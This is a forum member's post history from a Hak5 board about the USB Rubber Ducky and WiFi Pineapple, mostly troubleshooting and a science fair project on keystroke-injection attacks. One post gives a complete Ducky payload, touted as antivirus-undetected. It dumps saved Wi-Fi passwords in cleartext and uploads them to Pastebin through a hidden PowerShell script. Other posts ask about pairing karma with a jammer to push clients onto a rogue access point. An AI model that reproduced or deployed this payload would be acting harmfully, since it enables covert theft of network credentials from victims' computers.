Jump to content

DrDinosaur

Active Members
  • Posts

    189
  • Joined

  • Last visited

  • Days Won

    2

Everything posted by DrDinosaur

  1. Is there an issue with special characters in the password like "$" or "!"?
  2. Hak5 recommended the Sandisk one because they have done extensive testing on that one, and it supposedly works fine. I'm not sure why it's not working since it would probably draw as little power as possible.
  3. Unfortunately, I have this issue too. I fix for this would be huge. I currently have a few of my most used modules on the internal storage so I can access them when full power isn't available. The main issue, of course, is the lack of space on the internal side.
  4. Ok, I got it working. I think the problem was that when the toolkit tried to install the server, it didn't work. When I manually installed the package, it started working. The commands you put up also helped though. Thanks.
  5. I know the general concept. I just need information on the steps required to do it.
  6. Hello. I have an Alfa USB adapter, a USB hub, and a USB mass storage device. How do I have one radio run karma and one radio run jammer? I want to run them simultaneously so that the devices that were connected to nearby APs would connect to the Karma AP once the nearby APs were taken down by the jammer. Any help would be appreciative. Thanks.
  7. When I tried to set a password that started with a capital letter, I think it just pressed enter without letting me actually type my full password. Actually, I think it just automatically goes, even without me typing anything. Here's the output: Please set a password for DrDinosaur /usr/bin/simple-ducky: line 2357: pure-pw: command not found /usr/bin/simple-ducky: line 2358: pure-pw: command not found /usr/bin/simple-ducky: line 2359: cd: /etc/pure-ftpd/auth/: No such file or directory Creating you home directory, it will reside at /ftphome/ Starting the FTP server. To test your new account, in a new terminal type: ftp 127.0.0.1 /usr/bin/simple-ducky: line 2369: /etc/init.d/pure-ftpd: No such file or directory I tried to set it up again, but it says the username already exists.
  8. Hello again. Just a quick update. I made it to the state science fair and presented my project to some of the professors of computer science at the nearby university. They seemed to enjoy it and were interested. Here's what I put on FB: "Won three awards for my science fair project. I got best in category for computer science in senior research (best computer science project in state of Hawaii), $200 from Intel in the national Excellence in Computer Science Award (winner of entire computer science division), and $200 from the Department of Information and Computer Sciences and the University of Hawaii at Manoa (general award for excellence in computer science). They even said my project name out loud (which is rare and rather humorous given the manner in which they said it in) and spelt my name right in everything. Until next year." Thanks to the rubber ducky community for all the resources and support! I hope to do another computer security project next year. Maybe with pineapple, but I'm not sure yet. Anyway, thanks again. Regards, Dillon
  9. What is the estimated battery life using the pineapple juice battery on full charge? I plan to use the occupineapple running on autostart. I don't plan to use a USB hub or extra Wi-Fi adapter. I'm only using the simple 5 dBi antenna. I can also go without the USB. I currently use the USB fit 4GB from the Hak Shop. How much of a difference would that make using it or not? What settings should I put that would increase battery life without reducing the effectiveness of the occupineapple module (I just need to show the SSIDs from a list)? Any help would be great. Thanks.
  10. Ok, it looked like that works, thanks.
  11. Autostart is not working for me. Monitor mode turns on, but mdk3 is not automatically starting. It runs fine manually, so it might be an issue with auto start. I finally got it working. I had to uninstall mdk3 via the opkg manager from USB and re-install it on my internal storage. This may be because the module was installed on the internal space while the mdk3 package was on the USB. Anyway, I'm just glad it works now. Well, it's actually not working like how I would want it to. Before a reboot, I set the list to one that I created by myself. When it finishes the reboot, the SSIDs showing up aren't from the list I created, but rather from no list at all. They are all randomly generated. When I go to the settings, I see that no list at all is set. The module should recognize the previous list that was selected or in use, or it should have an option for what list to use during autostart. Thanks.
  12. Hello. Has anyone gotten the duck to run payloads just a normal machine would run them using a virtual machine on VirtualBox with the default firmware? I think I tried in the past, but you had to like mount the device or something like that with the menus in VirtualBox before a USB starts working in the VM. Has anyone played around with that? How do you guys normally safely test your payloads? Thanks.
  13. Hello. I was interested in this attack vector, so I did some research on it. I liked the idea, so I did some experimentation as well. I'd just like to share my research paper I wrote on it. It covers both the Teensy and the USB Rubber Ducky. The district fair is coming up soon, so I have to prepare for it. Anyway, here is the link to the paper: http://goo.gl/meKuj Thanks!
  14. To run something like the CMD as admin, get to the UAC and try "ALT Y"
  15. Maybe you could try to spoof the Ducky to look like an Apple keyboard.
  16. There is a Kautilya payload that exports WLAN passwords to a Pastebin account. It has also been added to duck sauce v.02. I'll add it here if anyone wants to try it out. It works prefectly on my Teensy with Kautilya, so it can probably work on the Ducky. This is undetected by Bitdefender Total Security 2013 if anyone was wondering. REM Description: Grabs WLAN Key information REM Author: COnverted from Kautilya by Prickleypaw REM DuckSauce v0.2 by Prickleypaw REM ---- Command Prompt DuckSauce v.02 ---- ESCAPE CONTROL ESCAPE STRING cmd /T:01 /K "@echo off && mode con:COLS=15 LINES=1 && title Installing Drivers" ENTER DELAY 250 STRING echo $wlans = netsh wlan show profiles ^| Select-String -Pattern "All User Profile" ^| Foreach-Object {$_.ToString()} > %temp%\wlan.ps1 ENTER STRING echo $exportdata = $wlans ^| Foreach-Object {$_.Replace(" All User Profile : ",$null)} >> %temp%\wlan.ps1 ENTER STRING echo $data = $exportdata ^| ForEach-Object {netsh wlan show profiles name="$_" key=clear} >> %temp%\wlan.ps1 ENTER STRING echo Function Post_http($url,$parameters) >> %temp%\wlan.ps1 ENTER STRING echo { >> %temp%\wlan.ps1 ENTER STRING echo $http_request = New-Object -ComObject Msxml2.XMLHTTP >> %temp%\wlan.ps1 ENTER STRING echo $http_request.open("POST", $url, $false) >> %temp%\wlan.ps1 ENTER STRING echo $http_request.setRequestHeader("Content-type","application/x-www-form-urlencoded") >> %temp%\wlan.ps1 ENTER STRING echo $http_request.setRequestHeader("Content-length", $parameters.length); >> %temp%\wlan.ps1 ENTER STRING echo $http_request.setRequestHeader("Connection", "close") >> %temp%\wlan.ps1 ENTER STRING echo $http_request.send($parameters) >> %temp%\wlan.ps1 ENTER STRING echo $script:session_key=$http_request.responseText >> %temp%\wlan.ps1 ENTER STRING echo $session_key >> %temp%\wlan.ps1 ENTER STRING echo } >> %temp%\wlan.ps1 ENTER REM ---- need to enter Pastebin information below ---- STRING echo Post_http "http://pastebin.com/api/api_login.php" "api_dev_key=INPUT2&api_user_name=INPUT0&api_user_password=INPUT1" >> %temp%\wlan.ps1 ENTER STRING echo Post_http "http://pastebin.com/api/api_post.php" "api_user_key=$session_key&api_option=paste&api_dev_key=INPUT2&api_paste_name=Wlan_Info&api_paste_code=$data&api_paste_private=2" >> %temp%\wlan.ps1 ENTER STRING echo Set oShell = CreateObject("WScript.Shell") > %temp%\wlan.vbs ENTER STRING echo oShell.Run("powershell.exe -ExecutionPolicy Bypass -noLogo -command %temp%\wlan.ps1"),0,true >> %temp%\wlan.vbs ENTER STRING wscript %temp%\wlan.vbs ENTER STRING exit ENTER STRING exit
  17. Hi. I saw Darren using this module in an episode of Hak5. I can't, however, find it in the pineapple bar. How do I install this module?
  18. I was having the same problem too. I'm using the AC for power. I'm hoping that I only needed that for the first installation or if there are any workarounds.
  19. Ok. I'm running the default firmware (duck.hex) for HID attacks, so I'll use 3500ms as the initial delay for installation on new machines.
  20. Thanks for the replies. If someone were to use this in say a work environment with no knowledge of their current keyboard setup (so cloning wouldn't be possible), what would be a reasonable delay that would pretty safely work across all the machines? I just a general standard. I'm not actually going to need to test this on those machines right now. I just need a simple benchmark that would work in a real world situation. Thanks!
  21. Hello. I was wondering what delay you should give the rubber ducky when you need to run it on a completely new machine. I'm doing a science fair project on this and I was wondering what a good delay at the start of a script would be to allow installation of the drivers. After the drivers are installed, the payload would continue it's normal course, just like a test machine. I want to know a good delay so it would be accurate to a real attack scenario where someone would plug this in to a new computer. IIRC, it took a quite some time to install compared to the Teensy. They are only one time events though, so I don't have good knowledge of them. Maybe I could uninstall the drivers to test it again? If that's possible, which drivers would I target? Sorry if this is confusing. Thanks!
  22. I got it all set up now. I had to go to a port and add pineapple at the end I think. Thanks for the help again stealthkit!
  23. I switched from the WAN/LAN port to the PoE port. I'm able to get good pings on both 172.16.42.42 and 172.16.42.1 now and 172.16.42.1 redirects to 172.16.42.42, but I am still unable to get to the interface. I added you on Skype stealthkit.
  24. Yes, I have the two boxes for the sharing tab checked. I'm confused on "Also if you did, did you know that it will change the IP address to a different IP for the internet sharing? So you will have to change it back to 172.16.42.42/24 in that case." I am still getting a ping to 172.16.42.42. I disabled IPv6 too. I have the Ethernet cable plugged into the LAN port of my pineapple. I see activity lights on both my pineapple and my laptop. I have the WLAN, PWR, and WPS lights powered on my pineapple and my ethernet port glows white on my laptop. I included a picture.
×
×
  • Create New...